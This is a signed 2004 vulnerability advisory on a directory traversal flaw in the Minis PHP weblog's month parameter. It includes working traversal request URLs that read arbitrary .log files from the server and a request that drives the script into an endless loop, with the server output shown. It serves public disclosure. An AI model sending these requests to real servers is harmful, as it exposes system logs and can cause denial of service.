MinisTraverse.txt

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
Title: Minis directory traversal vulnerability  
Vulnerability discovery: Madelman <madelman AT iname.com>  
Date: 31/12/2004  
Severity: Moderate  
  
Summary:  
- --------  
  
(from vendor site: http://minis.sourceforge.net/)  
  
Minis is a tiny, PHP-powered, text-file based weblogging system.  
It is easily configured for normal use and it doesnt require any  
databases, such as MySQL. Also, with some PHP-knowledge youll be  
able to configure Minis endlessly.  
  
Minis doesn't check the month parameter which allows reading any file with   
.log extension  
  
This vulnerability has been tested with Minis 0.2.1  
  
  
Details:  
- --------  
  
If we want to read /var/log/XFree86.0.log:  
  
REQUEST:  
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86.0  
RETURNS: (looking at source of HTML)  
[...]  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=This   
is a pre-release version of XFree86, and is not supported in any  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=way.   
Bugs may be reported to [email protected] and patches submitted  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=to   
[email protected]. Before reporting bugs in pre-release versions,  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=please   
check the latest version in the XFree86 CVS repository  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=(http://www.XFree86.Org/cvs).  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=XFree86 Version 4.3.0.1 (Debian 4.3.0.dfsg.1-4 20040529113443 [email protected])  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Release Date: 15 August 2003  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=X   
Protocol Version 11, Revision 0, Release 6.6  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build   
Operating System: Linux 2.6.6-rc3-bk9 i686 [ELF]  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build   
Date: 29 May 2004  
[...]  
  
If we try to read a file that doesn't exist (in this example   
/var/log/XFree86.log) Minis returns "No such month"  
  
REQUEST:  
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86  
RESPONSE:  
No such month.  
  
  
If we try to read a file the webserver doesn't have autorization to, Minis   
enters an endless loop which  
could cause an incredible amount of bandwith spent by the server or even a   
DoS  
  
REQUEST:  
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/auth  
RETURNS:  
Warning: fopen(blog/../../../../../../../../var/log/auth.log): failed to   
open stream: Permission denied in /var/www/minis/minis.php on line 109  
  
../../../../../../../../var/log/auth  
  
Warning: feof(): supplied argument is not a valid stream resource in   
/var/www/minis/minis.php on line 111  
  
Warning: fgets(): supplied argument is not a valid stream resource in   
/var/www/minis/minis.php on line 112  
  
Warning: feof(): supplied argument is not a valid stream resource in   
/var/www/minis/minis.php on line 111  
  
Warning: fgets(): supplied argument is not a valid stream resource in   
/var/www/minis/minis.php on line 112  
[...]  
  
  
Timeline  
- --------  
  
31/12/2004 - Vulnerability found  
31/12/2004 - Vendor contacted  
16/01/2005 - Vendor hasn't replied. Advisory released  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.2.3 (MingW32)  
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org  
  
iD8DBQFB6qyg3RWooxY20cIRAg4cAJ41z36lEK44et5nx4V6tspofoo+zACgnLr6  
nUEj8oDBySiBN2ScbMinO7s=  
=sSF1  
-----END PGP SIGNATURE-----  
`